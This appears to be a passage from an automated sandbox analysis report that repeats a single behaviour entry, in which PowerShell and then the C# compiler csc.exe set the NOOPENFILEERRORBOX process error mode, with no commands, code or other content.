                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
